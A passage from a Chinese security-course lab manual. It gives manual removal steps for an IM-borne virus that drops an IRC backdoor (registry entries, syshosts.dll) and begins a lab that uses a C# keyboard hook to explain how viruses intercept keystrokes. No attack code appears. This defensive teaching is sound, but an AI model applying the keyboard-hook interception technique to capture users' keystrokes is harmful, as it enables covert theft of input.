右面有個阻止訪問注冊表編輯工具 設(shè)置成已禁用 確定即可。(5) 隨時升級IE瀏覽器的補丁。即時通信型病毒實驗【實驗環(huán)境】本地主機或Windows實驗臺或其他安裝Windows系統(tǒng)的主機MSN【實驗步驟】一、 病毒發(fā)作現(xiàn)象如Error! Reference source not found.所示，用戶運行接收到的壓縮文件中的程序就會被病毒感染。病毒還會在用戶電腦里釋放一個后門程序，黑客可以利用IRC軟件遠(yuǎn)程控制中毒電腦，竊取個人資料，從而使用戶面臨極大的安全威脅。圖2.4.101二、 手工清除方法(一) 刪除病毒在注冊表中的啟動項目(1) 點擊“開始”菜單，選擇運行；輸入“regedit”啟動注冊表編輯器。(2) 打開HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionShellServiceObjectDelayLoad項，找到名為“syshosts”一項，將其值記錄下來。例如本機中該值為“8D4C2FB9-6DF1-46EA-B6A0-D6”，如圖2.4.102所示。圖2.4.102(3) 將syshosts項刪除打開注冊表中的HKEY_CLASSES_ROOTCLSID項，找到剛剛記錄下的項目，本例中為8D4C2FB9-6DF1-46EA-B6A0-D6，如圖2.4.103所示。圖2.4.103(4) 重新啟動計算機。(二) 刪除病毒文件(1) 打開“我的電腦”，選擇菜單“工具|文件夾選項”，點擊“查看”，取消“隱藏受保護的操作系統(tǒng)文件”前的對勾，并在“隱藏文件和文件夾”項中選擇“顯示所有文件和文件夾”，點擊“確定”；同時取消掉“隱藏已知類型文件的擴展名”前的對勾，點擊“確定”。(2) 進入Windows文件夾(默認(rèn)為C:Windows)，找到名為“photos.zip”的文件，如圖2.4.104所示，將其刪除。圖2.4.104(3) 進入系統(tǒng)文件夾(默認(rèn)為C:Windowssystem32)，找到名為“syshosts.dll”的文件，如圖2.4.105所示，將其刪除。圖2.4.105(4) 再次重新啟動計算機，查看這兩個文件是否存在，若不存在，則說明病毒已經(jīng)被清除干凈。鍵盤鉤子病毒實驗【實驗環(huán)境】本地主機或Windows實驗臺或其他安裝Windows系統(tǒng)的主機Microsoft Visual Studio 2005/C#【實驗步驟】簡單的理解，鉤子就是想鉤住一些東西，在程序里可以利用鉤子提前處理些Windows消息。本實驗通過鍵盤鉤子實驗介紹病毒的實現(xiàn)原理。下載本實驗的示例源碼，并解壓縮。進入“HookTestbinDebug”目錄，雙擊執(zhí)行HookTest.exe如下圖：點擊開始按鈕，用戶在TextBox里輸入的時候，不管敲鍵盤的哪個鍵，TextBox里顯示的始終為“鉤子已經(jīng)改寫了輸入內(nèi)容！”并給出提示信息“您輸入的內(nèi)容已經(jīng)被改寫，小心病毒哦！”如下圖；這時我們就可以利用鉤子監(jiān)聽鍵盤消息，先往Windows的鉤子鏈表中加入一個自己寫的鉤子監(jiān)聽鍵盤消息，只要一按下鍵盤就會產(chǎn)生一個鍵盤消息，我們的鉤子在這個消息傳到TextBox之前先截獲它，讓TextBox顯示“鉤子已經(jīng)改寫了輸入內(nèi)容！”并彈出提示信息，之后結(jié)束這個消息，這樣Te